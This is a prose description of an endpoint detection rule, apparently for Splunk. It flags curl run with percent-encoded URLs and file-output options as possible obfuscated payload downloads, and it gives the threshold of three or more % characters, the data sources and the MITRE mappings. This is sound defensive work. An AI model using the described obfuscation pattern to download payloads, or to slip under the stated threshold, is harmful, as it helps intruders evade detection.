This anomaly rule detects execution of the curl utility with percent-encoded URLs and explicit file output options (such as -o or --output) in command lines. It relies on endpoint telemetry (EDR) to identify curl invocations and flags those that appear to URL-encode download locations or payload paths to evade simple detections. The detection focuses on curl.exe or curl and requires that the command line includes a -o/--output style option and contains percent (%) encoding. The analysis counts the number of % characters in the command line and triggers when three or more are present, indicating potential obfuscation via URL encoding. Thresholds are tunable to fit environment risk appetite. On trigger, analysts should review the decoded URL, destination host, parent process, and any downloaded file to determine authorization or malicious intent. Implementation uses Splunk data with the Endpoint Processes model, aggregating telemetry from multiple sources (e.g., CrowdStrike ProcessRollup2, Sysmon Event ID 1, Sysmon for Linux Event ID 1, Windows Security Event 4688) via a tstats-based query that identifies curl processes with -o/--output and a command line containing % characters. The rule maps to a risk-based alert with an informational message about a process spawning curl with URL-encoded parameters, and provides risk objects (user and destination) and threat objects (parent process name, process name, and process). It references MITRE techniques for obfuscated/encoded information (T1027) and Ingress Tool Transfer (T1105), and includes multiple references for curl URL encoding and behavior. Known false positives are not identified at this time. The rule includes drilldown searches for per-user/destination results and risk events, and supports further investigation through example test data from Sysmon and Windows Sysmon logs. This rule is designed to help detect potential payload retrieval, malware staging, or tool deployment during download workflows.